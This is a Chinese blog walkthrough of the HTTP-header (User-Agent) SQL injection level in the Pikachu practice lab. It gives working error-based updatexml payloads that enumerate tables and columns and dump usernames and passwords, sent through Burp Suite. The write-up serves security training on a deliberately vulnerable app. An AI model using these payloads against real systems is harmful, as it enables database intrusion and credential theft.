Pikachu SQL注入之http头注入

账号admin 密码123456登录进去,然后进入后台我们就可以看到这个界面:

这里解释一下http头注入:

HTTP头注入是一种安全漏洞,它允许攻击者在HTTP请求或响应的头部字段中插入恶意内容。这种漏洞通常发生在未正确验证或过滤用户输入的情况下。

HTTP头包含在请求或响应的起始行和头部字段中。攻击者可以通过在头部字段中插入特定的控制字符或换行符来注入恶意内容。这可能导致以下安全问题:

1. HTTP响应拆分攻击:攻击者可以在响应头部中插入换行符,从而在HTTP响应中创建多个响应。这可能导致攻击者注入恶意内容,如恶意重定向或注入恶意脚本。

2. HTTP响应走私攻击:攻击者可以在响应头部中插入特定的控制字符,从而欺骗代理服务器或浏览器,使其解析响应的方式与服务器预期的不同。这可能导致绕过安全控制,如绕过身份验证或访问受限资源。

3. HTTP请求劫持攻击:攻击者可以在请求头部中插入恶意内容,如恶意URL或恶意Cookie。这可能导致用户被重定向到攻击者控制的站点,或者攻击者能够获取用户的敏感信息。

这个界面给了两个提示,一个是UA头就是use agent另一个就是Accept头,这里我们就直接尝试在UA头进行测试:

使用burp suite抓包:(这里有个插件比较方便,叫ModHeader,在火狐也可以安装)

我这里只用bp给大家做示范,想用插件的可以去网上搜一下。

由于前面一直都是报错注入,所以我这边直接使用报错注入尝试,单引号闭合:

爆库名:

这里OR是一个逻辑运算符,用于将两个或多个条件中的任何一个满足的情况下返回true,这里可以使用and但是后面使用报错注入的时候and就不合适了。

爆表名:

' or updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,31),0x7e),1) or '

爆列名:

' or updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users'),1,31),0x7e),1) or '

爆数据:

' or updatexml(1,concat(0x7e,substr((select group_concat(concat(username,' : ',password)) from users),1,31),0x7e),1) or '

于是用户名和密码都有了。

拿下!

  • 13
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
引用和提到了一种叫做SQL注入的攻击方式。SQL注入是一种利用应用程序对用户输入的不当处理导致数据库执行非预期操作的漏洞。在引用和中提到的例子中,攻击者利用了应用程序中存在的漏洞,通过在用户输入中插入恶意的SQL代码,使数据库执行了恶意操作。具体来说,在这两个例子中,攻击者尝试获取pikachu数据库中的用户信息。 如果你对pikachu SQL注入感兴趣,我建议你参考引用中的文章。这篇文章详细介绍了字符型SQL注入的过程和防范措施,可以帮助你更好地理解和应对这种类型的攻击。123 #### 引用[.reference_title] - *1* *2* [PiKachuSql (SQL注入)通关 2022](https://blog.csdn.net/av11566/article/details/124259545)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}} ] [.reference_item] - *3* [pikachu-sql注入](https://blog.csdn.net/Resets_/article/details/129901110)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}} ] [.reference_item] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

zTale

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值